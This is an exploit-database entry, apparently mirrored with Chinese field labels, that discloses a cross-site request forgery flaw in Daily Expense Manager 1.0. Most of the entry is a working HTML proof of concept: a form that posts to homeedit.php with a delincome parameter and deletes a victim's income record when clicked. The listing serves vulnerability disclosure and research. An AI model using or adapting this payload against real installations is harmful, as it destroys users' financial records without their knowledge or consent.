Daily Expense Manager 1.0 – Cross-Site Request Forgery (Delete Income)

  • 作者: Mr Winst0n
    日期: 2019-08-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47213/
  • # Exploit Title: Daily Expense Manager - CSRF (Delete Income)
    # Exploit Author: Mr Winst0n
    # Author E-mail: manamtabeshekan@gmail.com
    # Discovery Date: August 8, 2019
    # Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
    # Tested Version: 1.0
    # Tested on: Parrot OS
    
    
    # PoC:
    
    <html>
    <body>
    	<form action="http://server/homeedit.php?delincome=778" method="post">
    		<input type="submit" value="Click!" />
    	</form>
    </body>
    </html>